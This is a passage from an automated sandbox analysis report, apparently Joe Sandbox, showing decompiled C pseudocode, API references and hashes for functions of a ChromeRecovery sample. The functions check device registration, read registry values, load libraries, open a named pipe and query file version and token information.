					}
				} else {
					_t27 = 0x80004005;
				}
				asm("lock cmpxchg [edx], ebx");
				_t41 = _t27;
				if(_t27 >= 0) {
					_t22 = _v8;
					_t38 = E00C76765(L"NetApi32.dll", 0xca8af8, _t41);
					if(_t38 != 0) {
						_t15 = GetProcAddress(_t38, "NetFreeAadJoinInformation");
						if(_t15 != 0) {
							 *_t15(_t22);
						}
						FreeLibrary(_t38);
					}
				}
				goto L15;
			}

0x00c76624
0x00c76625
0x00c76626
0x00c7662d
0x00c766ca
0x00c766ca
0x00c766d2
0x00c766d7
0x00c766d7
0x00c7663d
0x00c7664b
0x00c7664f
0x00c7665e
0x00c76664
0x00c76666
0x00c7667b
0x00c7667d
0x00c76668
0x00c7666d
0x00c76670
0x00c76673
0x00c76675
0x00c76675
0x00c76682
0x00c76684
0x00c76686
0x00c76689
0x00c7668d
0x00c7668d
0x00c76689
0x00c76651
0x00c76651
0x00c76651
0x00c76696
0x00c7669a
0x00c7669c
0x00c7669e
0x00c766ab
0x00c766af
0x00c766b7
0x00c766bf
0x00c766c2
0x00c766c2
0x00c766c5
0x00c766c5
0x00c766af
0x00000000

APIs

GetProcAddress.KERNELBASE ref: 00C7665E
FreeLibrary.KERNEL32 ref: 00C76673
GetProcAddress.KERNEL32 ref: 00C766B7
FreeLibrary.KERNEL32 ref: 00C766C5

Strings

NetApi32.dll, xrefs: 00C76637, 00C766A1
NetGetAadJoinInformation, xrefs: 00C76658
NetFreeAadJoinInformation, xrefs: 00C766B1

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: NetApi32.dll$NetFreeAadJoinInformation$NetGetAadJoinInformation
API String ID: 3013587201-2909723663
Opcode ID: 44684eec48e51344c6a3f14c0e0734f82a29c695a9e03fddae14d52c42a8f1d3
Instruction ID: 0e2467d8071fefde5bceebf115f1fb7fa0b65b4aacaf4743f256e953f2df482b
Opcode Fuzzy Hash: 44684eec48e51344c6a3f14c0e0734f82a29c695a9e03fddae14d52c42a8f1d3
Instruction Fuzzy Hash: F6117D70601F17AB8B145BB68C80E6E7768DF82718751423EF52AE3290CE70DE0496A4

Uniqueness

Uniqueness Score: -1.00%

Function 00C765A4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E00C765A4(void* __ecx) {
				char _v8;
				intOrPtr _t4;
				int _t8;
				_Unknown_base(*)()* _t10;
				void* _t11;
				void* _t13;
				void* _t19;
				struct HINSTANCE__* _t26;

				_push(__ecx);
				_t28 =  *0xca8aa8 - 0xffffffff;
				if( *0xca8aa8 == 0xffffffff) {
					_v8 = 0;
					_t8 = E00C76765(L"MDMRegistration.dll", _t19, _t28); // executed
					_t26 = _t8;
					if(_t26 != 0) {
						_t10 = GetProcAddress(_t26, "IsDeviceRegisteredWithManagement");
						if(_t10 == 0) {
							_t8 = FreeLibrary(_t26);
							_t13 = 0x80004005;
						} else {
							_t11 =  *_t10( &_v8, 0, 0); // executed
							_t13 = _t11; // executed
							_t8 = FreeLibrary(_t26); // executed
						}
						if(_t13 >= 0 && _v8 != 0) {
						}
					}
					asm("lock cmpxchg [ecx], edi");
				}
				_t4 =  *0xca8aa8; // 0x0
				asm("sbb al, al");
				return  ~(_t4 - 1) + 1;
			}

0x00c765a7
0x00c765a8
0x00c765af
0x00c765ba
0x00c765bd
0x00c765c2
0x00c765c6
0x00c765cf
0x00c765d7
0x00c765ed
0x00c765f3
0x00c765d9
0x00c765df
0x00c765e2
0x00c765e4
0x00c765e4
0x00c765fb
0x00c765fb
0x00c765fb
0x00c7660d
0x00c76612
0x00c76613
0x00c7661b
0x00c76620

APIs

GetProcAddress.KERNEL32 ref: 00C765CF
FreeLibrary.KERNELBASE ref: 00C765E4
FreeLibrary.KERNEL32 ref: 00C765ED

Strings

MDMRegistration.dll, xrefs: 00C765B5
IsDeviceRegisteredWithManagement, xrefs: 00C765C9

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: FreeLibrary$AddressProc
String ID: IsDeviceRegisteredWithManagement$MDMRegistration.dll
API String ID: 1309337288-129496282
Opcode ID: df3b35f8592e7687c4e06319cf3b1f89d339ccfe3a743ffd6284e5e4f5424f2c
Instruction ID: 8b901618d7ffcdea8175c63ef75abb581b1d35be98aa2d82b933f80c82704cda
Opcode Fuzzy Hash: df3b35f8592e7687c4e06319cf3b1f89d339ccfe3a743ffd6284e5e4f5424f2c
Instruction Fuzzy Hash: 86012671605A15AB9B25477A9D4CFAFB7ACDBC2B68300033AF526D31D0CF74CE05A660

Uniqueness

Uniqueness Score: -1.00%

Function 00C72EB2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00C72EB2() {
				void* _v8;
				int _v12;
				char _v16;
				int _v20;
				long _t14;
				long _t18;
				int* _t22;
				int _t24;

				_t22 = 0;
				_v8 = 0;
				_t14 = RegOpenKeyExW(0x80000002, L"Software\\Google\\UpdateDev\\", 0, 0x20019,  &_v8); // executed
				if(_t14 == 0) {
					_t24 = 4;
					_v16 = 0;
					_v20 = _t24;
					_v12 = _t24;
					_t18 = RegQueryValueExW(_v8, L"IsEnabledLogToFile", 0,  &_v12,  &_v16,  &_v20);
					RegCloseKey(_v8);
					if(_t18 == 0 && _v12 == _t24 && _v16 != 0) {
						_t22 = 1;
					}
					return _t22;
				}
				return 0;
			}

0x00c72ebc
0x00c72ecf
0x00c72ed2
0x00c72eda
0x00c72ee4
0x00c72ee8
0x00c72eef
0x00c72ef6
0x00c72f03
0x00c72f0e
0x00c72f16
0x00c72f22
0x00c72f22
0x00000000
0x00c72f27
0x00000000

APIs

RegOpenKeyExW.KERNELBASE ref: 00C72ED2
RegQueryValueExW.ADVAPI32(00000000,IsEnabledLogToFile,00000000,?,?,00C732A8), ref: 00C72F03
RegCloseKey.ADVAPI32(00000000), ref: 00C72F0E

Strings

IsEnabledLogToFile, xrefs: 00C72EFB
Software\Google\UpdateDev\, xrefs: 00C72EC5

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: IsEnabledLogToFile$Software\Google\UpdateDev\
API String ID: 3677997916-1490309917
Opcode ID: b2fbc25204e5c162d88f90cd374f4ad0a839322ab9d0d3255b147bdc7edd642f
Instruction ID: dcbbd7be2d207c7175942952c1dd08acab87d8d6a56de75b27933b18e1155dad
Opcode Fuzzy Hash: b2fbc25204e5c162d88f90cd374f4ad0a839322ab9d0d3255b147bdc7edd642f
Instruction Fuzzy Hash: 13010CB1D40258BBDF219F959C89EEFBBFCEB45754F108167E511A2241D2709B01DA60

Uniqueness

Uniqueness Score: -1.00%

Function 00C75CF9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00C75CF9(WCHAR** __ecx) {
				signed int _t2;
				signed int _t3;
				struct HINSTANCE__* _t7;
				WCHAR** _t11;

				_t2 =  *0xcaa744;
				_t11 = __ecx;
				if((_t2 & 0x00000001) != 0) {
					_t3 =  *0xcaa740;
				} else {
					 *0xcaa744 = _t2 | 0x00000001;
					_t3 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "AddDllDirectory");
					 *0xcaa740 = _t3;
				}
				asm("sbb eax, eax");
				_t7 = LoadLibraryExW( *_t11, 0, ( ~_t3 & 0x000007f8) + 8); // executed
				return _t7;
			}

0x00c75cf9
0x00c75cff
0x00c75d03
0x00c75d2b
0x00c75d05
0x00c75d12
0x00c75d1e
0x00c75d24
0x00c75d24
0x00c75d32
0x00c75d41
0x00c75d48

APIs

GetModuleHandleW.KERNEL32 ref: 00C75D17
GetProcAddress.KERNEL32 ref: 00C75D1E
LoadLibraryExW.KERNELBASE(00000000,00000000,?), ref: 00C75D41

Strings

kernel32.dll, xrefs: 00C75D0D
AddDllDirectory, xrefs: 00C75D05

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID: AddDllDirectory$kernel32.dll
API String ID: 310444273-3973626626
Opcode ID: 7e196bbc472f60c32c975e0535c52775ac6e5db36fef2859ab11a10816739c8a
Instruction ID: fa206712afb7c85a663bddce353ae836104d58d1b685616b6fde9cd06709b4d0
Opcode Fuzzy Hash: 7e196bbc472f60c32c975e0535c52775ac6e5db36fef2859ab11a10816739c8a
Instruction Fuzzy Hash: 0BE0D872968611DFDB104F64ED0EB6D37B4E716315B000926F506D3160C3BC8841DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00C7F00F Relevance: 7.6, APIs: 5, Instructions: 65
pipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00C7F00F(WCHAR** __ecx) {
				DWORD* _v8;
				long _v12;
				void* _t9;
				void* _t12;
				intOrPtr _t17;
				WCHAR* _t19;
				WCHAR** _t21;
				void* _t26;

				_t21 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t19 = __ecx;
				if(__ecx[5] >= 8) {
					_t19 =  *__ecx;
				}
				_t26 = _t21[6];
				if(_t26 == 0) {
					_v8 = 0;
					while(1) {
						_t9 = CreateFileW(_t19, 0x103, 0, 0, 3, 0x110000, 0); // executed
						_t26 = _t9;
						if(_t26 != 0xffffffff) {
							goto L10;
						}
						if(GetLastError() != 0xe7 || WaitNamedPipeW(_t19, 0x7d0) == 0) {
							L9:
							_t26 = 0;
						} else {
							_t17 = _v8 + 1;
							_v8 = _t17;
							if(_t17 < 2) {
								continue;
							} else {
								goto L9;
							}
						}
						goto L10;
					}
				} else {
					_t21[6] = 0;
				}
				L10:
				if(_t26 != 0) {
					_v12 = 2;
					if(SetNamedPipeHandleState(_t26,  &_v12, 0, 0) == 0) {
						CloseHandle(_t26);
						_t26 = 0;
					}
					_t12 = _t26;
				} else {
					_t12 = 0;
				}
				return _t12;
			}

0x00c7f00f
0x00c7f012
0x00c7f013
0x00c7f01b
0x00c7f01d
0x00c7f01f
0x00c7f01f
0x00c7f021
0x00c7f028
0x00c7f02f
0x00c7f032
0x00c7f042
0x00c7f048
0x00c7f04d
0x00000000
0x00000000
0x00c7f05a
0x00c7f078
0x00c7f078
0x00c7f06c
0x00c7f06f
0x00c7f070
0x00c7f076
0x00000000
0x00000000
0x00000000
0x00000000
0x00c7f076
0x00000000
0x00c7f05a
0x00c7f02a
0x00c7f02a
0x00c7f02a
0x00c7f07a
0x00c7f07c
0x00c7f087
0x00c7f098
0x00c7f09b
0x00c7f0a1
0x00c7f0a1
0x00c7f0a3
0x00c7f07e
0x00c7f07e
0x00c7f07e
0x00c7f0a9

APIs

CreateFileW.KERNELBASE(00000000,00000103,00000000,00000000,00000003,00110000,00000000), ref: 00C7F042
GetLastError.KERNEL32 ref: 00C7F04F
WaitNamedPipeW.KERNEL32 ref: 00C7F062
SetNamedPipeHandleState.KERNEL32 ref: 00C7F090
CloseHandle.KERNEL32 ref: 00C7F09B

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: HandleNamedPipe$CloseCreateErrorFileLastStateWait
String ID:
API String ID: 1846735221-0
Opcode ID: a8633a67085c6fb6f65b5f747b5736faa605e69a586c7d17477b507220ac824f
Instruction ID: 54bcb20ca2b113f7160b01436b3a180739c09183e40aa42ef2263b9ca0350d33
Opcode Fuzzy Hash: a8633a67085c6fb6f65b5f747b5736faa605e69a586c7d17477b507220ac824f
Instruction Fuzzy Hash: 3C11A771A01210ABCB204B25DC8CF5F7AACEB85B55F20426DF819E7352D2718E42D7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00C79179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00C79179(void** __ecx, short* _a4) {
				int _v8;
				void* _v12;
				int _v16;
				void* __ebp;
				int _t15;
				void* _t17;
				int _t18;
				int _t21;
				int _t34;
				void* _t35;
				void** _t36;

				_t36 = __ecx; // executed
				_t15 = GetFileVersionInfoSizeW(_a4,  &_v16); // executed
				_t34 = _t15;
				_t37 = _t34;
				if(_t34 == 0) {
					L9:
					return 0;
				}
				_push(_t34); // executed
				_t17 = E00C93DB5(_t37); // executed
				 *_t36 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t18 = GetFileVersionInfoW(_a4, _v16, _t34, _t17); // executed
				if(_t18 != 0) {
					_t35 = 0;
					_v8 = 0;
					_v12 = 0;
					_t21 = VerQueryValueW( *_t36, L"\\VarFileInfo\\Translation",  &_v12,  &_v8);
					__eflags = _t21;
					if(_t21 == 0) {
						L7:
						L00C7F9A7( *_t36);
						L8:
						_t36[1] = _t35;
						 *_t36 = _t35;
						goto L9;
					}
					__eflags = _v8;
					if(_v8 == 0) {
						goto L7;
					}
					_t36[1] = ( *_v12 & 0x0000ffff) << 0x00000010 |  *(_v12 + 2) & 0x0000ffff;
					return 1;
				}
				L00C7F9A7( *_t36);
				_t35 = 0;
				goto L8;
			}

0x00c79188
0x00c7918a
0x00c79190
0x00c79192
0x00c79194
0x00c7920a
0x00000000
0x00c7920a
0x00c79196
0x00c79197
0x00c7919c
0x00c791a1
0x00000000
0x00000000
0x00c791ab
0x00c791b3
0x00c791c3
0x00c791c9
0x00c791d4
0x00c791d7
0x00c791dd
0x00c791df
0x00c791fd
0x00c791ff
0x00c79204
0x00c79204
0x00c79207
0x00000000
0x00c79209
0x00c791e1
0x00c791e4
0x00000000
0x00000000
0x00c791f7
0x00000000
0x00c791fa
0x00c791b7
0x00c791bc
0x00000000

APIs

GetFileVersionInfoSizeW.KERNELBASE(?,?,?,00000000), ref: 00C7918A
GetFileVersionInfoW.KERNELBASE(?,?,00000000,00000000,?,00000000), ref: 00C791AB
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,00000000), ref: 00C791D7

Strings

\VarFileInfo\Translation, xrefs: 00C791CD

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue
String ID: \VarFileInfo\Translation
API String ID: 2179348866-675650646
Opcode ID: 5e8f0b592e5b0fd4196117fa9440829d8a3f957e59bdb421fb0ea79c4a786acc
Instruction ID: 3dc6449c7e9e30a2f7c0e1070ed04f7c2ba0a957508e6ee0d0f140f9184430cf
Opcode Fuzzy Hash: 5e8f0b592e5b0fd4196117fa9440829d8a3f957e59bdb421fb0ea79c4a786acc
Instruction Fuzzy Hash: 8A118F75900205FBDB21AF69C848D6EBBF9FFC5750750802AE8A6D2120EB30CA11EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C7C246 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00C7C246(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v520;
				void* _v524;
				char _v528;
				void* __ebp;
				signed int _t13;
				char* _t18;
				void** _t19;
				void* _t27;
				void* _t28;
				void* _t36;
				void* _t37;
				signed int _t39;

				_t36 = __esi;
				_t35 = __edi;
				_t28 = __ecx;
				_t13 =  *0xca8008; // 0x617e0cdd
				_v8 = _t13 ^ _t39;
				_t27 = 0;
				E00C81190(__edi,  &_v520, 0, 0x200);
				_v528 = 0x100;
				_t18 =  &_v520;
				__imp__GetComputerNameExW(3, _t18,  &_v528); // executed
				if(_t18 == 0) {
					L3:
					_t19 =  &_v524;
					_v524 = _t27;
					__imp__NetWkstaGetInfo(_t27, 0x64, _t19, _t36); // executed
					_t37 = _v524;
					if(_t19 == 0 &&  *((intOrPtr*)(_t37 + 8)) != _t27 && E00C8EBB4(_t35, _t37,  *((intOrPtr*)(_t37 + 8)), L"google") == 0) {
						_t27 = 1;
					}
					NetApiBufferFree(_t37);
				} else {
					_push(_t28);
					if(E00C77516( &_v520) == 0) {
						goto L3;
					} else {
					}
				}
				return E00C7F35B(_v8 ^ _t39);
			}

0x00c7c246
0x00c7c246
0x00c7c246
0x00c7c24f
0x00c7c256
0x00c7c25f
0x00c7c269
0x00c7c271
0x00c7c282
0x00c7c28b
0x00c7c293
0x00c7c2aa
0x00c7c2ab
0x00c7c2b1
0x00c7c2bb
0x00c7c2c1
0x00c7c2c9
0x00c7c2e3
0x00c7c2e3
0x00c7c2e6
0x00c7c295
0x00c7c295
0x00c7c2a4
0x00000000
0x00c7c2a6
0x00c7c2a6
0x00c7c2a4
0x00c7c2fb

APIs

GetComputerNameExW.KERNEL32(00000003,?,00000100), ref: 00C7C28B
NetWkstaGetInfo.NETAPI32(00000000,00000064,?), ref: 00C7C2BB
NetApiBufferFree.NETAPI32(?,?,?,00000000), ref: 00C7C2E6

Part of subcall function 00C77516: lstrlenW.KERNEL32 ref: 00C77526
Part of subcall function 00C77516: lstrlenW.KERNEL32 ref: 00C77532
Part of subcall function 00C77516: CharLowerW.USER32(?,?,00C7C2A1,?,?,?,00000000), ref: 00C7755B
Part of subcall function 00C77516: CharLowerW.USER32(76C869A0,?,00C7C2A1,?,?,?,00000000), ref: 00C77565

Strings

google, xrefs: 00C7C2D0

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: CharLowerlstrlen$BufferComputerFreeInfoNameWksta
String ID: google
API String ID: 723138920-1696396625
Opcode ID: ed5316f808302028f69c6342cd109a6b5b5ba55117963dcba274779289052dbe
Instruction ID: 7a87050af2a35e7bd13a343a5fdc454938bf11d151fe65bbed3f95938600199e
Opcode Fuzzy Hash: ed5316f808302028f69c6342cd109a6b5b5ba55117963dcba274779289052dbe
Instruction Fuzzy Hash: B811A77151071A9BDB20AFA0DC8DBEE73BCEF15304F0081AEE52AE7192DA709E448E54

Uniqueness

Uniqueness Score: -1.00%

Function 00C74FA3 Relevance: 6.1, APIs: 4, Instructions: 79
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00C74FA3(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				long _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v32;
				void* __ebp;
				signed int _t18;
				long _t25;
				void* _t26;
				int _t31;
				void* _t33;
				union _TOKEN_INFORMATION_CLASS _t36;
				void* _t45;
				void* _t46;
				intOrPtr* _t48;
				signed int _t49;
				void* _t50;

				_t45 = __edi;
				_t18 =  *0xca8008; // 0x617e0cdd
				_v8 = _t18 ^ _t49;
				_v20 = __ecx;
				if(_a4 == 0) {
					L13:
					__eflags = 0;
				} else {
					_t36 = 1;
					GetTokenInformation( *(__ecx + 4), 1, 0, 0,  &_v12); // executed
					if(GetLastError() != 0x7a) {
						goto L13;
					} else {
						_t25 = _v12;
						_t48 = 0;
						_v16 = 0;
						_t54 = _t25 - 0x400;
						if(_t25 > 0x400) {
							L5:
							_push(_t25);
							_t26 = L00C74F66(_t36,  &_v16, _t45, _t48);
							_t48 = _v16;
							_t46 = _t26;
						} else {
							_t33 = E00C74B82(_t25, _t54);
							_t25 = _v12;
							if(_t33 == 0) {
								goto L5;
							} else {
								E00C93B80();
								_t46 = _t50;
							}
						}
						if(_t46 == 0) {
							L9:
							_t36 = 0;
						} else {
							_t31 = GetTokenInformation( *(_v20 + 4), _t36, _t46, _v12,  &_v12); // executed
							if(_t31 == 0) {
								goto L9;
							} else {
								E00C74C42(_a4,  *_t46);
								L11:
								while(_t48 != 0) {
									_t48 =  *_t48;
									E00C83557(_t48);
								}
								goto L14;
							}
						}
						goto L11;
					}
				}
				L14:
				return E00C7F35B(_v8 ^ _t49);
			}

0x00c74fa3
0x00c74fa9
0x00c74fb0
0x00c74fbc
0x00c74fbf
0x00c75057
0x00c75057
0x00c74fc5
0x00c74fcf
0x00c74fd4
0x00c74fe3
0x00000000
0x00c74fe5
0x00c74fe5
0x00c74fe8
0x00c74fea
0x00c74fed
0x00c74ff2
0x00c7500b
0x00c7500b
0x00c7500f
0x00c75014
0x00c75017
0x00c74ff4
0x00c74ff6
0x00c74ffd
0x00c75000
0x00000000
0x00c75002
0x00c75002
0x00c75007
0x00c75007
0x00c75000
0x00c7501b
0x00c75042
0x00c75042
0x00c7501d
0x00c7502c
0x00c75034
0x00000000
0x00c75036
0x00c7503b
0x00000000
0x00c7504f
0x00c75047
0x00c75049
0x00c7504e
0x00000000
0x00c75053
0x00c75034
0x00000000
0x00c7501b
0x00c74fe3
0x00c75059
0x00c7506a

APIs

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00C74FD4
GetLastError.KERNEL32 ref: 00C74FDA
GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00C7502C

Part of subcall function 00C74B82: __alloca_probe_16.LIBCMT ref: 00C74BA5

__alloca_probe_16.LIBCMT ref: 00C75002

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: InformationToken__alloca_probe_16$ErrorLast
String ID:
API String ID: 434645856-0
Opcode ID: 90b1b56b654a43148293af3b26fd92f1d7af29104eb81ea9616df813de21c268
Instruction ID: 2f583b451f91987c3115e80148682faede9660db01a8b330f8ff06fec7d4f5db
Opcode Fuzzy Hash: 90b1b56b654a43148293af3b26fd92f1d7af29104eb81ea9616df813de21c268
Instruction Fuzzy Hash: 4C219231A00508AFDF149B64C845FBFB7B8EF45794F158069E42AA7251DB70AF05DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00C78249 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00C78249(void* __ecx, signed int __edx, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				int _v8;
				int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v28;
				void* _t42;
				signed short _t45;
				void* _t47;
				signed short _t48;
				signed short _t49;
				void* _t51;
				void* _t53;
				void* _t54;
				WCHAR* _t64;
				signed int _t78;
				signed short _t81;
				int _t83;

				_t78 = __edx;
				_t64 = __edx;
				_t81 = 0x80070003;
				E00C7189E( &_v8, __edx, __eflags, __ecx);
				_t42 = E00C789EB( &_v8, __edx, __eflags);
				_t83 = _v8;
				if(_t42 == 0) {
					L19:
					_t40 = _t83 - 0x10; // -16
					E00C713C0(_t42, _t40);
					return _t81;
				}
				_v24 = _v24 & 0x00000000;
				_v28 = 0xca41c0;
				_v20 = 0x200;
				_t45 = E00C7806C( &_v28, _t42, _t83, _t78 | 0x00020019); // executed
				_t81 = _t45;
				if(_t81 != 0) {
					L18:
					_v28 = 0xca41c0;
					_t42 = E00C77F74( &_v28);
					goto L19;
				}
				_t47 = _a4 - 1;
				if(_t47 == 0) {
					_t48 = E00C7844C( &_v28, _t64, _a8); // executed
					L15:
					_t81 = _t48;
					L16:
					_t49 = E00C77F74( &_v28);
					if(_t81 == 0) {
						_t81 = _t49;
					}
					goto L18;
				}
				_t51 = _t47;
				if(_t51 == 0) {
					_v16 = _v16 & 0x00000000;
					_t48 = E00C7839C( &_v28, _t64,  &_v16, _a8, _a12);
					goto L15;
				}
				_t53 = _t51 - 1;
				if(_t53 == 0) {
					_t48 = E00C78413( &_v28, _t64, _a8); // executed
					goto L15;
				}
				_t54 = _t53 - 3;
				if(_t54 == 0) {
					_v8 = 0;
					_v16 = 0;
					_v12 = 0;
					_t81 = E00C7839C( &_v28, _t64,  &_v16,  &_v12,  &_v8);
					__eflags = _t81;
					if(_t81 < 0) {
						goto L16;
					}
					_t48 = E00C78585(_v12, _v8, _a8);
					goto L15;
				} else {
					if(_t54 == 4) {
						_v8 = _v8 & 0x00000000;
						_v12 = 8;
						_t81 = SHQueryValueExW(_v24, _t64, 0,  &_v8, _a8,  &_v12);
						__eflags = _t81;
						if(_t81 > 0) {
							_t81 = _t81 & 0x0000ffff | 0x80070000;
						}
					} else {
						_t81 = 0x8007065d;
					}
					goto L16;
				}
			}

0x00c78249
0x00c78256
0x00c78258
0x00c7825d
0x00c78265
0x00c7826a
0x00c7826f
0x00c7838d
0x00c7838d
0x00c78390
0x00c7839b
0x00c7839b
0x00c78275
0x00c78282
0x00c7828c
0x00c78293
0x00c78298
0x00c7829c
0x00c7837e
0x00c78381
0x00c78388
0x00000000
0x00c78388
0x00c782a5
0x00c782a8
0x00c78369
0x00c7836e
0x00c7836e
0x00c78370
0x00c78373
0x00c7837a
0x00c7837c
0x00c7837c
0x00000000
0x00c7837a
0x00c782af
0x00c782b2
0x00c7834c
0x00c7835b
0x00000000
0x00c7835b
0x00c782b8
0x00c782bb
0x00c78342
0x00000000
0x00c78342
0x00c782bd
0x00c782c0
0x00c78309
0x00c7830c
0x00c7830f
0x00c78324
0x00c78326
0x00c78328
0x00000000
0x00000000
